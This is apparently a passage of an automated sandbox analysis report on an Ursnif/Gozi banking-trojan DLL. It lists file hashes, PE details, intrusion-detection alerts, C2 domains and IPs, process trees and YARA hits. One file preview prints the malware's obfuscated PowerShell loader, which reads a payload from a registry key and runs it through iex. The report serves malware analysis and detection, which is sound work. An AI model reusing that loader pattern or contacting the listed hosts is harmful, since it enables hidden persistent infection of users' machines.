      SHA-512:54F864A2896D8E1F6E823FF772B83BBEC64FF4C168452CD26F48E1ABB63D893A6CEA0DEE867F00BB6E6589F30067EA2EEB7D548532BD2C82B8500336722EFE19
      Malicious:true
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ogaysol0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ogaysol0.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):2.6126528340247575
      Encrypted:false
      SSDEEP:24:etGSA8mmUcg85pc/Gkw8jK4Y44cytkZf4BAhkWI+ycuZhNoakSUPNnq:6yXcb5pc/GATYGJ4iH1uloa30q
      MD5:A6B57979C7AD2B4CBAC552425D5CB813
      SHA1:C0E45D0A5183428E5F78FFE9FACAE3CB2C0AD0B5
      SHA-256:D123410A1805652A7BC690BF10B6977631C3E77FDCB050CDBF1A566A5CD09C3C
      SHA-512:981F8CD31FD29EEF26F83EF9343DFA7B2CC1D822907EE8EF25F13600C084B3ADCA0FE02B8EC6C658C39BFABCE22AF60560EC6EF4A63FB9B314D75BF7F80835E7
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m~c...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..`.............................................................(....*BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................;.4...............".......................".............. B............ O............ b.....P ......m.........s.....y.....~.....................m. ...m...!.m.%...m.......*.....3.5.....B.......O.......b...........
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (435), with CRLF, CR line terminators
      Category:modified
      Size (bytes):856
      Entropy (8bit):5.2943491536729015
      Encrypted:false
      SSDEEP:24:AId3ka6KgZ/EvEKaM5DqBVKVrdFAMBJTH:Akka67Z/EvEKxDcVKdBJj
      MD5:50C74C046FB0EE64D9B5F8E5DBB460C8
      SHA1:93BAA2180617F9E08F88B576767BD94AE1D90389
      SHA-256:028344F3A16E36A1FF79F1F2DEC3AE3DE37D55C29049D2F29D4AF5BC0479B9E4
      SHA-512:8435A946B587AF7047E31665FFAAD7650A1A4ABC0F3A8EBA6F690EEACFABCD616E591CA00D8DD78FF56937E8A1818924C23E8C57FDCE4D1B9D60C80501C34C83
      Malicious:false
      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ogaysol0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ogaysol0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      Process:C:\Windows\explorer.exe
      File Type:ASCII text, with no line terminators
      Category:modified
      Size (bytes):224
      Entropy (8bit):5.4294053843645305
      Encrypted:false
      SSDEEP:6:QHYK1sVs9vKnsvMTLgyKBM34H6183F1tu4r9iyeqmM:Qbs69isvMTLgyaI4HnA4cyeHM
      MD5:087D25A6367D4908B1950E74BBE47BA0
      SHA1:74A6AC0B9117A9C4A6EFCD802DFE018FFD3073AA
      SHA-256:FB5AB966A8BBC9A96850025473B3AF9F0934AC41BD9275BFBECB89DEE8FD0F15
      SHA-512:6CC5CAFE9E7C00771E3EA912A2B86C7FC05216E36D7EFA953C2A333F4107D7E8A1784F5F8F9098902B8F854095949169F22DFBE7A4FE6AD2CC2D400DCCF763E2
      Malicious:false
      Preview:new-alias -name dvjacws -value gp;new-alias -name nvbirko -value iex;nvbirko ([System.Text.Encoding]::ASCII.GetString((dvjacws "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
      Process:C:\Windows\explorer.exe
      File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
      Category:dropped
      Size (bytes):838
      Entropy (8bit):3.073236880282747
      Encrypted:false
      SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
      MD5:CA1C201059C5BFD5900F5EB2466883CC
      SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
      SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
      SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
      Malicious:false
      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................
      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.426948530257672
      TrID:
      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
      • Generic Win/DOS Executable (2004/3) 0.20%
      • DOS Executable Generic (2002/1) 0.20%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:7078612.dll
      File size:507904
      MD5:cba263871219062d981111b00cc131fc
      SHA1:50e2c7caf7dd0f826bc6e814bd62fbb39982ceed
      SHA256:65f687a5c0e757cd8e296f8b0453b27726e5017502e93dcb8379d59fe9c056a3
      SHA512:147ce45b24d541edb048ae1e3b82fbdb72e4f88be6fcad04c16d0eaa761f1c3120fdd49a371bf458556b7e1ee03152d48cd5a77cb6a095a63ae238d5929492d3
      SSDEEP:6144:VcmfGth2n/4QpDArdVgncHm3pPXig93bNvKQ7lzLNc0RMkHsBAih:XYwFxAmcHm5vigDvKQBzTM/f
      TLSH:2EB4F12BA519A87DCCA041B73C53B2B8FADE18868341D1DF3A047D80FD945DA563E1BB
      File Content Preview:MZ......................@.......................................S#...Br..Br..Br...w..Br.y.p..Cr...w..Cr.....'Cr.....?Cr..:..&Cr.....MCr.....%Cr.y.r.iCr..&s.>Cr..Bs..Cr..:...Cr......Br..Bs./Cr.y...ACr......Br..:...Cr...w..Cr......Cr.0....Cr.....;Br......Br
      Icon Hash:74f0e4ecccdce0e4
      Entrypoint:0x401023
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
      DLL Characteristics:TERMINAL_SERVER_AWARE
      Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:0
      File Version Major:5
      File Version Minor:0
      Subsystem Version Major:5
      Subsystem Version Minor:0
      Import Hash:b7fa5d0a561f82b8d27459b3b4a585bc
      Instruction
      jmp 00007FDB7CCE568Dh
      jmp 00007FDB7CCECF88h
      jmp 00007FDB7CCE53C3h
      jmp 00007FDB7CCE511Eh
      jmp 00007FDB7CCE4F89h
      jmp 00007FDB7CCF24C4h
      jmp 00007FDB7CCE507Fh
      jmp 00007FDB7CCF56FAh
      jmp 00007FDB7CCF1385h
      jmp 00007FDB7CCF67F0h
      jmp 00007FDB7CCE501Bh
      jmp 00007FDB7CCE6B56h
      jmp 00007FDB7CCF8D91h
      jmp 00007FDB7CCF02DCh
      jmp 00007FDB7CCE7B87h
      jmp 00007FDB7CCE5462h
      jmp 00007FDB7CCFBDEDh
      jmp 00007FDB7CCE51D8h
      jmp 00007FDB7CCF7AA3h
      jmp 00007FDB7CCEE15Eh
      jmp 00007FDB7CCE8B99h
      jmp 00007FDB7CCF78B4h
      jmp 00007FDB7CCE53AFh
      jmp 00007FDB7CCF34FAh
      jmp 00007FDB7CCEAE85h
      jmp 00007FDB7CCFAE50h
      jmp 00007FDB7CCE9DCBh
      jmp 00007FDB7CCE53A6h
      jmp 00007FDB7CCE4FE1h
      jmp 00007FDB7CCF462Ch
      jmp 00007FDB7CCF9DA7h
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x600000x12c.idata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x5e3.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00xa
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d0000x14d8.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x180000x1c.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x604a40x378.idata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x160b00x17000False0.05146059782608696data1.0048273513196446IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x180000x4019b0x41000False0.803857421875Matlab v4 mat-file (little endian) \200\005, numeric, rows 1669040516, columns 0, imaginary7.176271368129036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x590000x60370x4000False0.15228271484375data3.468987021215461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .idata0x600000xf070x1000False0.28369140625data3.4227887072363496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .reloc0x610000x1ae200x1b000False0.8245713975694444data7.229162958031707IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0x7c0000x5e30x1000False0.100830078125data0.8799703146474953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x7d0000x1c070x2000False0.33203125data4.731736757733484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountry
      RT_VERSION0x7c1700x2e0dataEnglishUnited States
      DLLImport
      mscms.dllGetStandardColorSpaceProfileW
      GDI32.dllGetTextExtentExPointI, GetSystemPaletteEntries, GetViewportOrgEx, GetRegionData, GetDeviceGammaRamp, GetViewportExtEx, GetWindowExtEx
      OLEAUT32.dllLoadTypeLibEx
      WINSPOOL.DRVGetPrinterW, FindFirstPrinterChangeNotification
      SHLWAPI.dllGetMenuPosFromID
      KERNEL32.dllGetBinaryTypeW, GetModuleFileNameW, GetCurrentThreadId, GetStringTypeW, GetTempPathA, GetConsoleCursorInfo, GetConsoleTitleW, DeleteVolumeMountPointW, GetSystemTimeAsFileTime, GetThreadContext, GetCurrentDirectoryA, GetDiskFreeSpaceExW, GetCommTimeouts, GetComputerNameW, DeleteFileA, GetFileType, DefineDosDeviceA, GetProcessWorkingSetSize, GetFileAttributesExW, DeactivateActCtx, GetThreadTimes, WriteProfileStringA, GetVersion, FindFirstFileExA
      Secur32.dllEnumerateSecurityPackagesW, GetUserNameExA, GetUserNameExW, InitializeSecurityContextA
      ole32.dllGetConvertStg
      msvcrt.dllmemset, strcmp
      urlmon.dllGetClassFileOrMime
      USER32.dllGetWindowTextA, EnumWindowStationsA, GetMessageTime, GetMenuDefaultItem, LoadMenuW, DefWindowProcW, GetKeyState, GetClassInfoExA, DestroyCursor, DestroyMenu, GetMessageA
      WININET.dllFindNextUrlCacheGroup
      VERSION.dllGetFileVersionInfoSizeA
      ADVAPI32.dllRegOpenKeyA, GetCurrentHwProfileA, GetUserNameW, GetCurrentHwProfileW
      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States
      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      192.168.2.7172.105.103.20749718802033203 11/23/22-10:55:47.657666TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4971880192.168.2.7172.105.103.207
      192.168.2.731.41.44.5149712802033203 11/23/22-10:55:05.800807TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4971280192.168.2.731.41.44.51
      192.168.2.731.207.46.12449722802033203 11/23/22-10:57:07.914871TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4972280192.168.2.731.207.46.124
      192.168.2.78.8.8.850505532023883 11/23/22-10:55:05.538404UDP2023883ET DNS Query to a *.top domain - Likely Hostile5050553192.168.2.78.8.8.8
      192.168.2.731.207.46.12449722802033204 11/23/22-10:57:08.286256TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4972280192.168.2.731.207.46.124
      192.168.2.713.107.42.1649711802033204 11/23/22-10:54:45.174848TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4971180192.168.2.713.107.42.16
      192.168.2.7172.105.103.20749718802033204 11/23/22-10:55:47.657666TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4971880192.168.2.7172.105.103.207
      192.168.2.713.107.42.1649711802033203 11/23/22-10:54:45.174848TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4971180192.168.2.713.107.42.16
      TimestampSource PortDest PortSource IPDest IP
      Nov 23, 2022 10:55:05.733344078 CET4971280192.168.2.731.41.44.51
      Nov 23, 2022 10:55:05.798542976 CET804971231.41.44.51192.168.2.7
      Nov 23, 2022 10:55:05.798758984 CET4971280192.168.2.731.41.44.51
      Nov 23, 2022 10:55:05.800806999 CET4971280192.168.2.731.41.44.51
      Nov 23, 2022 10:55:05.866620064 CET804971231.41.44.51192.168.2.7
      Nov 23, 2022 10:55:05.867005110 CET804971231.41.44.51192.168.2.7
      Nov 23, 2022 10:55:05.867136955 CET4971280192.168.2.731.41.44.51
      Nov 23, 2022 10:55:05.871192932 CET4971280192.168.2.731.41.44.51
      Nov 23, 2022 10:55:05.935247898 CET804971231.41.44.51192.168.2.7
      Nov 23, 2022 10:55:27.258526087 CET4971580192.168.2.762.173.149.9
      Nov 23, 2022 10:55:27.320111990 CET804971562.173.149.9192.168.2.7
      Nov 23, 2022 10:55:27.320281029 CET4971580192.168.2.762.173.149.9
      Nov 23, 2022 10:55:27.340270996 CET4971580192.168.2.762.173.149.9
      Nov 23, 2022 10:55:27.401597977 CET804971562.173.149.9192.168.2.7
      Nov 23, 2022 10:55:27.401680946 CET804971562.173.149.9192.168.2.7
      Nov 23, 2022 10:55:27.401807070 CET4971580192.168.2.762.173.149.9
      Nov 23, 2022 10:55:27.411504030 CET4971580192.168.2.762.173.149.9
      Nov 23, 2022 10:55:27.472536087 CET804971562.173.149.9192.168.2.7
      Nov 23, 2022 10:55:47.536580086 CET4971880192.168.2.7172.105.103.207
      Nov 23, 2022 10:55:47.655865908 CET8049718172.105.103.207192.168.2.7
      Nov 23, 2022 10:55:47.656070948 CET4971880192.168.2.7172.105.103.207
      Nov 23, 2022 10:55:47.657665968 CET4971880192.168.2.7172.105.103.207
      Nov 23, 2022 10:55:48.014420986 CET4971880192.168.2.7172.105.103.207
      Nov 23, 2022 10:55:48.420768976 CET4971880192.168.2.7172.105.103.207
      Nov 23, 2022 10:55:48.661602020 CET8049718172.105.103.207192.168.2.7
      Nov 23, 2022 10:55:48.673268080 CET8049718172.105.103.207192.168.2.7
      Nov 23, 2022 10:55:48.677355051 CET8049718172.105.103.207192.168.2.7
      Nov 23, 2022 10:56:47.442229986 CET4971880192.168.2.7172.105.103.207
      Nov 23, 2022 10:57:07.482496977 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.508729935 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.508820057 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.509660006 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.534919977 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780694008 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780745029 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780770063 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780791998 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780821085 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780847073 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780872107 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780898094 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780908108 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.780922890 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780946970 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.780946970 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.780976057 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.781004906 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806423903 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806471109 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806499004 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806524038 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806550980 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806575060 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806598902 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806623936 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806639910 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806649923 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806674957 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806700945 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806725979 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806729078 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806756020 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806759119 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806781054 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806782961 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806807041 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806828976 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806832075 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806855917 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806859016 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806894064 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806900978 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806910038 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806926012 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806946993 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.806948900 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.806978941 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.807002068 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.832395077 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832427025 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832452059 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832478046 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832503080 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832530022 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.832534075 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832559109 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832586050 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832611084 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832634926 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832662106 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832673073 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.832689047 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832712889 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832740068 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832741022 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.832768917 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832794905 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832813025 CET4972280192.168.2.731.207.46.124
      Nov 23, 2022 10:57:07.832819939 CET804972231.207.46.124192.168.2.7
      Nov 23, 2022 10:57:07.832870007 CET804972231.207.46.124192.168.2.7
      TimestampSource PortDest PortSource IPDest IP
      Nov 23, 2022 10:55:05.538403988 CET5050553192.168.2.78.8.8.8
      Nov 23, 2022 10:55:05.728375912 CET53505058.8.8.8192.168.2.7
      Nov 23, 2022 10:55:26.167500973 CET5333653192.168.2.78.8.8.8
      Nov 23, 2022 10:55:26.559088945 CET53533368.8.8.8192.168.2.7
      Nov 23, 2022 10:55:47.515340090 CET6076553192.168.2.78.8.8.8
      Nov 23, 2022 10:55:47.534537077 CET53607658.8.8.8192.168.2.7
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Nov 23, 2022 10:55:05.538403988 CET192.168.2.78.8.8.80x7083Standard query (0)meganetwork.topA (IP address)IN (0x0001)false
      Nov 23, 2022 10:55:26.167500973 CET192.168.2.78.8.8.80x95c3Standard query (0)supernetwork.topA (IP address)IN (0x0001)false
      Nov 23, 2022 10:55:47.515340090 CET192.168.2.78.8.8.80x4114Standard query (0)internetcoca.inA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Nov 23, 2022 10:55:05.728375912 CET8.8.8.8192.168.2.70x7083No error (0)meganetwork.top31.41.44.51A (IP address)IN (0x0001)false
      Nov 23, 2022 10:55:05.728375912 CET8.8.8.8192.168.2.70x7083No error (0)meganetwork.top62.173.140.167A (IP address)IN (0x0001)false
      Nov 23, 2022 10:55:26.559088945 CET8.8.8.8192.168.2.70x95c3No error (0)supernetwork.top62.173.149.9A (IP address)IN (0x0001)false
      Nov 23, 2022 10:55:26.559088945 CET8.8.8.8192.168.2.70x95c3No error (0)supernetwork.top31.41.44.27A (IP address)IN (0x0001)false
      Nov 23, 2022 10:55:47.534537077 CET8.8.8.8192.168.2.70x4114No error (0)internetcoca.in172.105.103.207A (IP address)IN (0x0001)false
      • meganetwork.top
      • supernetwork.top
      • internetcoca.in
      • 31.207.46.124

      Click to jump to process

      Target ID:0
      Start time:10:54:35
      Start date:23/11/2022
      Path:C:\Windows\System32\loaddll32.exe
      Wow64 process (32bit):true
      Commandline:loaddll32.exe "C:\Users\user\Desktop\7078612.dll"
      Imagebase:0x10a0000
      File size:116736 bytes
      MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Target ID:1
      Start time:10:54:35
      Start date:23/11/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6edaf0000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:10:54:35
      Start date:23/11/2022
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
      Imagebase:0xa60000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:3
      Start time:10:54:35
      Start date:23/11/2022
      Path:C:\Windows\SysWOW64\rundll32.exe
      Wow64 process (32bit):true
      Commandline:rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
      Imagebase:0x1330000
      File size:61952 bytes
      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
